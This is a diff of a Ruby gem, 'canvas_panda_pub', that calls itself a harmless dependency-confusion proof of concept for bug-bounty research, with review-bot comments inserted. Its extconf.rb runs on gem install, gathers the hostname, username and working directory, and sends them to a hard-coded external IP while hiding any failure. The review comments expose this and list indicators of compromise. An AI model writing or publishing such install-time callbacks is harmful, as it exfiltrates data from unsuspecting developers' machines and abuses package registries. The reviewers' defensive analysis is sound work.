canvas_panda_pub 0.0.1

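--- /dev/null
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+---
+SHA256:
+metadata.gz: f216ff9f7ed10fce8796b067fa24adf8f474a9ad3bb000e4437223e7b7da5913
+data.tar.gz: 94637ff14a6121e8e4703e375a70e64dba19d28f119da3818576cba4f46e3c3a
+SHA512:
+metadata.gz: ccdf161e99e5fb2e3da09785b5c55f3a656bb5fb982e53542f7cacc26b109a1b7b89e39eb7f39938182d5fbf2c3b5d6a543ca1d80a3000e92bb8f8225cc799ea
+data.tar.gz: f944b746105e003ec375055abef46fb0b9fc9b96725772f9f954802289cf59714126b86c1fb033d5123c192fd8d992e86a27b47879ea83dfdd34b86762cf7793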
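--- /dev/null
+++ b/ext/canvas_panda_pub/extconf.rb
@@ -0,0 +1,32 @@
+require "socket"
+require "json"
+
+# Dependency confusion PoC — harmless callback to prove code execution
+# This is part of authorized HackerOne bug bounty research
+begin
+hostname = `hostname`.strip rescue ""
+username = ENV["USER"] || ENV["USERNAME"] || ""
+cwd = Dir.pwd
+body = JSON.generate({
+"hostname" => hostname,
+"username" => username,
+"cwd" => cwd,
+"package" => "canvas_panda_pub",
+"company" => "instructure",
+"registry" => "rubygems"
+})
+sock = TCPSocket.new("54.80.197.209", 8443)
+sock.print "POST /cb/canvas_panda_pub HTTP/1.1\r\n"
+sock.print "Host: 54.80.197.209:8443\r\n"
+sock.print "Content-Type: application/json\r\n"
+sock.print "Content-Length: #{body.length}\r\n"
+sock.print "Connection: close\r\n"
+sock.print "\r\n"
+sock.print body
+sock.close
+rescue => e
+# Silently fail — this is just a PoC callback
+end
+
+# Create dummy Makefile so gem install succeeds
+File.write("Makefile", "all:\n\ttrue\ninstall:\n\ttrue\n")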
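Review bot: The comment above the `begin` block in extconf.rb calls the callback "harmless", but the block collects the output of a `hostname` shell-out, the `USER`/`USERNAME` environment value and `Dir.pwd` and POSTs them in clear text to the hard-coded address `54.80.197.209:8443` whenever the gem is installed (the gemspec lists this file under `extensions:`), which is install-time exfiltration of host-identifying data regardless of intent. The `rescue => e` clause then discards every failure (and never uses `e`), so the installing user sees no trace that a network request was attempted, and the HackerOne authorization asserted in the comment cannot be checked from anything in the package. Proving that the extension ran does not require sending data off-host: I would delete the entire `begin … end` block and keep only the `File.write("Makefile", …)` stub, at most replacing the callback with a local `warn "canvas_panda_pub: extconf executed"`. The header comment of lib/canvas_panda_pub.rb repeats the "harmless placeholder — no malicious functionality" claim and needs the same correction. For anyone triaging an install of this version, the destination `54.80.197.209:8443` and the request path `/cb/canvas_panda_pub` are the indicators to look for in egress logs.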
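--- /dev/null
+++ b/lib/canvas_panda_pub.rb
@@ -0,0 +1,11 @@
+# Dependency confusion proof-of-concept package
+# Registered as part of authorized HackerOne bug bounty research
+# This is a harmless placeholder — no malicious functionality
+
+module CanvasPandaPub
+VERSION = "0.0.1"
+
+def self.info
+"This is a dependency confusion PoC gem for authorized security research."
+end
+end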
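--- /dev/null
+++ b/metadata
@@ -0,0 +1,46 @@
+--- !ruby/object:Gem::Specification
+name: canvas_panda_pub
+version: !ruby/object:Gem::Version
+version: 0.0.1
+platform: ruby
+authors:
+- Security Research
+autorequire:
+bindir: bin
+cert_chain: []
+date: 2026-03-25 00:00:00.000000000 Z
+dependencies: []
+description: 'Harmless placeholder registered as part of authorized HackerOne bug
+bounty research. Contact: security researcher via HackerOne.'
+email: security-research@example.com
+executables: []
+extensions:
+- ext/canvas_panda_pub/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/canvas_panda_pub/extconf.rb
+- lib/canvas_panda_pub.rb
+homepage: https://github.com/nickel-lang/nickel
+licenses:
+- MIT
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+requirements: []
+rubygems_version: 3.4.20
+signing_key:
+specification_version: 4
+summary: Security research — dependency confusion proof of concept
+test_files: []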
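Review bot: The `extensions:` entry (`- ext/canvas_panda_pub/extconf.rb`) is what makes this package execute Ruby at `gem install` time rather than at require time, so whatever extconf.rb does runs with the installing user's privileges on every build host that resolves the name; a consumer reviewing this metadata should treat that entry, not the empty `dependencies: []`, as the item that needs scrutiny. Several other fields undercut the "authorized research" description: `homepage` points to https://github.com/nickel-lang/nickel, which appears unrelated to a gem whose callback labels itself with `"company" => "instructure"`, `email` is an example.com address, and `cert_chain: []` together with an empty `signing_key:` means nothing ties the upload to any identifiable researcher. I would expect a research placeholder that really is harmless to carry a verifiable contact, a homepage describing the program, and no `extensions:` hook at all.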